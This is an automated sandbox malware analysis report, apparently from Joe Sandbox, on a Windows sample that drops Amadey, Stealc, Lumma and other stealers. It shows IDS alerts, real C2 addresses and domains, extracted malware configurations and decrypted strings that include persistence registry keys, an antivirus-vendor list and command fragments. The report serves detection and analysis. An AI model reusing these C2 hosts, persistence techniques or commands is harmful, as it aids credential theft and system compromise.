                                                2025-03-06T08:10:54.125864+010028033053Unknown Traffic192.168.2.1159889176.113.115.780TCP
                                                2025-03-06T08:11:01.289703+010028033053Unknown Traffic192.168.2.1164553176.113.115.780TCP
                                                2025-03-06T08:11:11.530513+010028033053Unknown Traffic192.168.2.1164734176.113.115.780TCP
                                                2025-03-06T08:11:20.455950+010028033053Unknown Traffic192.168.2.1153723176.113.115.780TCP
                                                2025-03-06T08:11:31.570917+010028033053Unknown Traffic192.168.2.1150589176.113.115.780TCP
                                                2025-03-06T08:11:38.412334+010028033053Unknown Traffic192.168.2.1150709176.113.115.780TCP
                                                2025-03-06T08:11:45.383657+010028033053Unknown Traffic192.168.2.1150845176.113.115.780TCP
                                                2025-03-06T08:11:52.670839+010028033053Unknown Traffic192.168.2.1151004176.113.115.780TCP
                                                2025-03-06T08:11:57.182647+010028033053Unknown Traffic192.168.2.1151067176.113.115.780TCP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:10:26.376164+010028033043Unknown Traffic192.168.2.114976238.180.229.21780TCP
                                                2025-03-06T08:10:51.926775+010028033043Unknown Traffic192.168.2.114976238.180.229.21780TCP
                                                2025-03-06T08:10:53.619352+010028033043Unknown Traffic192.168.2.114976238.180.229.21780TCP
                                                2025-03-06T08:10:54.450296+010028033043Unknown Traffic192.168.2.114976238.180.229.21780TCP
                                                2025-03-06T08:10:55.202313+010028033043Unknown Traffic192.168.2.114976238.180.229.21780TCP
                                                2025-03-06T08:10:57.213629+010028033043Unknown Traffic192.168.2.114976238.180.229.21780TCP
                                                2025-03-06T08:10:57.744358+010028033043Unknown Traffic192.168.2.114976238.180.229.21780TCP
                                                2025-03-06T08:11:09.760378+010028033043Unknown Traffic192.168.2.116463838.180.229.21780TCP
                                                2025-03-06T08:11:31.362311+010028033043Unknown Traffic192.168.2.115057638.180.229.21780TCP
                                                2025-03-06T08:11:32.375360+010028033043Unknown Traffic192.168.2.115057638.180.229.21780TCP
                                                2025-03-06T08:11:33.566273+010028033043Unknown Traffic192.168.2.115063738.180.229.21780TCP
                                                2025-03-06T08:11:34.943927+010028033043Unknown Traffic192.168.2.115065638.180.229.21780TCP
                                                2025-03-06T08:11:37.496570+010028033043Unknown Traffic192.168.2.115069438.180.229.21780TCP
                                                2025-03-06T08:11:38.614418+010028033043Unknown Traffic192.168.2.115071538.180.229.21780TCP
                                                2025-03-06T08:11:51.400793+010028033043Unknown Traffic192.168.2.115091845.93.20.2880TCP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:11:58.974565+010028032742Potentially Bad Traffic192.168.2.1151103185.176.43.9880TCP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:11:22.510401+010028438641A Network Trojan was detected192.168.2.1153747104.21.80.1443TCP
                                                2025-03-06T08:11:39.121321+010028438641A Network Trojan was detected192.168.2.1150703104.21.24.225443TCP
                                                2025-03-06T08:11:44.330345+010028438641A Network Trojan was detected192.168.2.1150804104.21.48.1443TCP
                                                2025-03-06T08:12:02.382432+010028438641A Network Trojan was detected192.168.2.1151118104.21.48.1443TCP

                                                Joe Sandbox Signatures

                                                Click to jump to signature section

                                                Show All Signature Results

                                                AV Detection

                                                barindex
                                                Antivirus / Scanner detection for submitted sample
                                                Source: aV2ffcSuKl.exeAvira: detected
                                                Antivirus detection for dropped file
                                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vertualiziren[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                                Source: C:\ProgramData\jnxnee\benskvi.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\ILqcVeT[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\rXOl0pp[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exeAvira: detection malicious, Label: TR/Kryptik.zivzb
                                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exeAvira: detection malicious, Label: HEUR/AGEN.1314794
                                                Found malware configuration
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpMalware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
                                                Source: 0000001D.00000003.2078657215.0000000004774000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SystemBC {"HOST1": "towerbingobongoboom.com", "HOST2": "62.60.226.86"}
                                                Source: 62.2.7dbaa342f5.exe.dd00000.6.raw.unpackMalware Configuration Extractor: GCleaner {"C2 addresses": ["185.156.73.73", "45.91.200.135"]}
                                                Multi AV Scanner detection for dropped file
                                                Source: C:\ProgramData\jnxnee\benskvi.exeReversingLabs: Detection: 50%
                                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vertualiziren[1].exeReversingLabs: Detection: 50%
                                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[1].exeReversingLabs: Detection: 95%
                                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\nhDLtPT[1].exeReversingLabs: Detection: 60%
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeReversingLabs: Detection: 60%
                                                Source: C:\Users\user\AppData\Local\Temp\10111190101\acd63ce6fe.exeReversingLabs: Detection: 95%
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeReversingLabs: Detection: 60%
                                                Multi AV Scanner detection for submitted file
                                                Source: aV2ffcSuKl.exeVirustotal: Detection: 68%Perma Link
                                                Source: aV2ffcSuKl.exeReversingLabs: Detection: 63%
                                                Joe Sandbox ML detected suspicious sample
                                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                                Sample uses string decryption to hide its real strings
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: 176.113.115.6
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: /Ni9kiput/index.php
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: S-%lu-
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: bb556cff4a
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: rapes.exe
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: Startup
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: cmd /C RMDIR /s/q
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: rundll32
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: Programs
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: %USERPROFILE%
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: cred.dll|clip.dll|
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: cred.dll
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: clip.dll
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: http://
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: https://
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: /quiet
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: /Plugins/
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: &unit=
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: shell32.dll
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: kernel32.dll
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: GetNativeSystemInfo
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: ProgramData\
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: AVAST Software
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: Kaspersky Lab
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: Panda Security
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: Doctor Web
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: 360TotalSecurity
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: Bitdefender
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: Norton
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: Sophos
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: Comodo
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: WinDefender
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: 0123456789
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: ------
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: ?scr=1
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: ComputerName
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: -unicode-
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: VideoID
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: DefaultSettings.XResolution
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: DefaultSettings.YResolution
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: ProductName
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: CurrentBuild
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: rundll32.exe
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: "taskkill /f /im "
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: " && timeout 1 && del
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: && Exit"
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: " && ren
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: Powershell.exe
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: -executionpolicy remotesigned -File "
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: shutdown -s -t 0
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: random
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: Keyboard Layout\Preload
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: 00000419
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: 00000422
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: 00000423
                                                Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpString decryptor: 0000043f

                                                Phishing

                                                barindex
                                                Yara detected obfuscated html page
                                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta, type: DROPPED
                                                Source: Yara matchFile source: C:\Temp\plDCQRtK9.hta, type: DROPPED
                                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta, type: DROPPED
                                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, type: DROPPED
                                                Source: aV2ffcSuKl.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:59943 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64532 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64586 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64662 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64756 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64821 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.11:64823 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:53736 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:53747 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:53889 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.11:53928 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:53950 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:53957 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.11:50532 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:50549 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.11:50574 version: TLS 1.2
                                                Source: unknownHTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:50611 version: TLS 1.2
                                                Source: Binary string: mozglue.pdbP source: ILqcVeT.exe, 00000017.00000002.2551363792.000000006B99D000.00000002.00000001.01000000.0000001D.sdmp
                                                Source: Binary string: nss3.pdb@ source: ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmp
                                                Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.1466076584.000001DDD56E5000.00000004.00000020.00020000.00000000.sdmp
                                                Source: Binary string: BitLockerToGo.pdb source: 7dbaa342f5.exe, 0000003E.00000002.2594796685.000000000DB74000.00000004.00001000.00020000.00000000.sdmp
                                                Source: Binary string: *e.pdb source: powershell.exe, 00000009.00000002.1468143447.000001DDD58B0000.00000004.00000020.00020000.00000000.sdmp
                                                Source: Binary string: tomation.pdb1 source: powershell.exe, 00000009.00000002.1466076584.000001DDD56E5000.00000004.00000020.00020000.00000000.sdmp
                                                Source: Binary string: nss3.pdb source: ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmp
                                                Source: Binary string: mozglue.pdb source: ILqcVeT.exe, 00000017.00000002.2551363792.000000006B99D000.00000002.00000001.01000000.0000001D.sdmp
                                                Source: Binary string: BitLockerToGo.pdbGCTL source: 7dbaa342f5.exe, 0000003E.00000002.2594796685.000000000DB74000.00000004.00001000.00020000.00000000.sdmp
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C7DBBE
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C4C2A2 FindFirstFileExW,0_2_00C4C2A2
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C868EE FindFirstFileW,FindClose,0_2_00C868EE
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00C8698F
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C7D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C7D076
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C7D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C7D3A9
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C89642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C89642
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C8979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C8979D
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C89B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00C89B2B
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C85C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00C85C97
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BEF011 FindFirstFileExW,20_2_00BEF011
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CEF011 FindFirstFileExW,21_2_00CEF011
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeFile opened: C:\Users\user\AppData\Local\Temp
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeFile opened: C:\Users\user\AppData
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeFile opened: C:\Users\user\AppData\Local
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeFile opened: C:\Users\user
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeFile opened: C:\Users\user\Documents\desktop.ini

                                                Software Vulnerabilities

                                                barindex
                                                Suspicious execution chain found
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Source: chrome.exeMemory has grown: Private usage: 6MB later: 30MB

                                                Networking

                                                barindex
                                                Suricata IDS alerts for network traffic
                                                Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.11:49752 -> 176.113.115.6:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:49759 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.11:49762 -> 38.180.229.217:80
                                                Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.11:49762 -> 38.180.229.217:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:49791 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 38.180.229.217:80 -> 192.168.2.11:49762
                                                Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.11:49762 -> 38.180.229.217:80
                                                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 38.180.229.217:80 -> 192.168.2.11:49762
                                                Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.11:49762 -> 38.180.229.217:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:49796 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:49777 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:49802 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:59843 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:59898 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2060385 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (exarthynature .run) : 192.168.2.11:58494 -> 1.1.1.1:53
                                                Source: Network trafficSuricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.11:59943 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:59985 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.11:64532 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.11:49762 -> 38.180.229.217:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:64596 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.11:64638 -> 38.180.229.217:80
                                                Source: Network trafficSuricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.11:64586 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.11:64638 -> 38.180.229.217:80
                                                Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 38.180.229.217:80 -> 192.168.2.11:64638
                                                Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.11:64638 -> 38.180.229.217:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:64700 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 38.180.229.217:80 -> 192.168.2.11:64638
                                                Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.11:64638 -> 38.180.229.217:80
                                                Source: Network trafficSuricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.11:64662 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.11:64756 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2060424 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tracnquilforest .life) : 192.168.2.11:59174 -> 1.1.1.1:53
                                                Source: Network trafficSuricata IDS: 2060416 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (quietswtreams .life) : 192.168.2.11:61809 -> 1.1.1.1:53
                                                Source: Network trafficSuricata IDS: 2060422 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strawpeasaen .fun) : 192.168.2.11:61777 -> 1.1.1.1:53
                                                Source: Network trafficSuricata IDS: 2060420 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (starrynsightsky .icu) : 192.168.2.11:61070 -> 1.1.1.1:53
                                                Source: Network trafficSuricata IDS: 2060414 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (foresctwhispers .top) : 192.168.2.11:52324 -> 1.1.1.1:53
                                                Source: Network trafficSuricata IDS: 2060418 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seizedsentec .online) : 192.168.2.11:62407 -> 1.1.1.1:53
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:64808 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.11:64821 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2060410 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (collapimga .fun) : 192.168.2.11:56056 -> 1.1.1.1:53
